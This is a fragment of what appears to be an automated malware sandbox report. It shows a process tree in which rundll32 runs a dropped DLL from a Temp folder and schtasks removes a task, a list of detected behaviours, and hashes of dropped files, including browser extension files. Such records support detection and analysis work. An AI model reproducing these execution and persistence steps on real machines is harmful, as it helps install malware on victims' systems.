C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rlXICvrLwbHDFviC\hiFaRPeg\WbmUCLr.dll",#1 /Tjsite_idcfw 3851181⤵PID:3392
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\rlXICvrLwbHDFviC\hiFaRPeg\WbmUCLr.dll",#1 /Tjsite_idcfw 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:3980 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "IypqguOSOyxhMfXuI"3⤵PID:2740
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD519bf15b6ed830277ed98e435ff1ecefa
SHA1d086c271459f1b1bd6ff361ed804ce4638a4ffd9
SHA2562ec54b605bc85eaa0c85bc4cb297b676eec07efe06f4eb92bbec74b4b2752592
SHA512b74ac27e082b7d85e5155ef960127115ebf1c420c2562f6e1eb3c4a3b73f6c261e1d93eefbb8b1204e4d4dd8136016e8efdb076e5b678a232ede8ed121187f66
-
Filesize
2KB
MD52d5c6590fc5c44b92f206ad67c3afa73
SHA11f21bb2a808d3f159f338df463daf773ca340e41
SHA25624fdfed990de104a398a2c9ed8545d7fa6b0c0ed2f3b6c21d0bd7323f88d96fc
SHA51246a3a318c995cb506e3c2f3e7589dbf700b31c0f520c95903ff806c331da0da2f0b449b8a966688afc433e00065bac6870de6a36367d0bf1b4e1802fffa176f1
-
Filesize
2KB
MD521c5103dc2b2894deeeb0fa1f442161e
SHA115f34d411bf3be6e044abefeceece5f2c5d1b26e
SHA256e2d6681a3bebc7eebf7fa023f199fb36e1a7c3de722df5acf05cd1e6a4e5be9e
SHA51277dfc6fdb492e73edf79bb7f3d2b64753f960340112dee84df16052c174ae0891b01fb42ca7c309de496f980952c75a33d80713bf6a2b15f0a45a558e3211554
-
Filesize
2KB
MD5811c8a43bb4cd85d41e2e10e12ade38a
SHA1ab0bc36cd13161cfcc3e2b83ed7b9c54cd4973e5
SHA2567ac3c38387d9a30d33ae9c030bd40e56e0467f1f568dac4005daeba2fa0e1c65
SHA5121de7502a208479688d4769ce851d5dbc4611c7180a217d963f7594dba7889f8c14367452ca43ab52665e50f472c83daf8665f3d8ac8fd299c3fcf3bc98926696
-
Filesize
2.0MB
MD5c657bd7d6025bddcf1d5aaba6fbdb309
SHA1fe20ec7d4b63cc46a24550caeb9aa642016e5007
SHA256376d674ae76ccd7b83fdb7f86a837a3a091a6acd5798853c70304d2034bd7bda
SHA5121e9ba12d3d7c0457a9beb91a116454d1948726617f0bdd83525ee3ce1820020b586ffd264e84999281fc36d9f9f9e5fbb01c6566fb6d80575456a65196528643
-
Filesize
2KB
MD5355e4fcf2e0359a89723dcc8342b26c6
SHA1a813ff2225ff9a6e12b78f88850fe54b9ae2c84d
SHA2569d995d50a9e77bbe9961016e5dfc2cc2f1abdf01c38fd371647fb519265ecbec
SHA5124de7c500ee4260cd0528daa87774a69d3451fa7e2e1f1930f656feec58848372404f4c4744ac70c25c225b491d1a9ef7a2bbccdef7ef08be1ff675e9daa2ce5b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD50e566c7235212a411f3f9279891e9897
SHA10bb1f7e8a881ed921b635505f5ef97543301b14d
SHA256f0feaf471bf73e07ef53f72700524d7dba553b0085903c779330e086a39253fb
SHA51208551366a1b5d55cbf0e065aee19cd8d5840bfae7eb937fd9ffdc32b698ef942832ab63bad0ac110721f1f94e7455a488f8d351f2afc3c0a14ecd8bbd2a1bd90
-
Filesize
35KB
MD5eba023094a6fd78b02b24aca1a918f36
SHA145317f310e3f4bb378b8cd2b21d1c0dc6c6b0126
SHA256d2825f709b7c8866474d78d16ff1303af644494626f549dd163cb52103de0f31
SHA512f7f236509f40d9fccd787d5e007b195994e3cc287187f08a225239eadada3faf9166f71f0dc5328ebef95cbd29c4ad37f4b8ecc8f07576f8d19920522e557fb9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
11KB
MD5babac497f18f29a0034415eb5519c1e5
SHA1fecb08e9395ca7de2d67acdd1e04a8dd4fb34072
SHA2568c4337a63db0b192aa5e875a5599967599d5719f60d90595439bb4e6112602f6
SHA51245516ca8bc1c5e72b6a57436be5752bc5a62d8f9ba890aba6fa0303917f4e7f5e05bab384ca3324dd897a95e83cbc12ee4f33035651b00e591be1bc5f3d730e3
-
Filesize
6.7MB
MD516ae562d94dcce83d2cd6da34596833d
SHA1b6f1087b5f791713001ad414543ba9fa3c12f884
SHA2566fb9d6c67c662830e76ae56dd13ba80fcc60ba2a1af0307776dfce30b995683a
SHA512aa440fd88c57d54b54173c998d02509f4363620fafaaa3907e162a01de61012611bdd4f6e3c7dce525225ae697c54ed6cd35b140d40fcfc76087b9b4fa2b5d87
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6KB
MD5e1c2c097f3fde1828de557229bdb3664
SHA132707673ebbaf20925ae7c2afaefcb05afd60c95
SHA256da34edd964e0f3d0bbc6f82f895359a2a75b24d47dff4f78339cba77f6c25fcd
SHA5120c5e385886cf71f438e039dd33f97e951a7ea261f56e201ac5c3f40e9aa7b3aa4f4f1bd0081681aaf95c32e8f3276a987d9a44eb6b64debdfe7366d23677a5f5
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD5aebf4bf6752c28a76f012ad901a1b27e
SHA19609832f721f53d59f2d01b9d740649f44f965ea
SHA25673316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4
SHA512dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5021d5973629c6318f7a443c0aedc613c
SHA1c0e180d509ac9029811f140a32e035530cd94ac1
SHA256be64e0cf18db75df0e3356b45cce1c98f19e87ae127e72968ad061e318c46771
SHA5124879088fcd3c95a7289bb96d7f6cd33e53f31e0c369abae060af96dd3934e5fc7eb84bd5d62d6676422daac83c5c5fbe76805bd0ddc85ccadfbf99ae2e0772ab
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5814c3a49081cb1a85b7dce560bfb7637
SHA137e443bb747421862a3ed2b12a8060e37b8251d8
SHA256f24c7285eb4590b2b5bec2608404b409e6316f989a0c4d0a531fe61693ffc75a
SHA512b97a9210822b9b8fff51302fecb4d8c4ffe9e39ab7a1929890adcbd9e52d2633db6d2f0c42ae252fa3c92580d551ee38b6f6ce2f0d551821bc482b64ad9fef57
-
Filesize
6.4MB
MD57e7d1734fa1d84d40a690218aa21a449
SHA16648a3e46a62c4f81fa68e58b645d390bc80534a
SHA256c4989b8f312865d911df20e27445f3371d90c1e5f89f0bec54329527f16360b8
SHA512f2d6bca7dd5d94dd2eb3f4633161e745c1f6036a0dd275fd3ddfccb4975ef0598a0579324ffd5dc3a320b1e0e33698b8d4e3f7d185cabf6a6b6ec6a853258f76
-
Filesize
6KB
MD5b2865e186121a2b7eeedff1c3d6e89a3
SHA17794ff3dda1fe3715aed6039abaf96025fcda95d
SHA256b8157cc068c8ce6f196fccc5319dac7e1e19cf4310916ef1abaa035c184d9d11
SHA5122c05acfe45bb77568a41ee34370c69346722b64caf4d98ed2493f7a4f9ce91020e9473b9ffbefa35ba55e9585e2a555618ca19f41a9b689b461e700a2975e9c6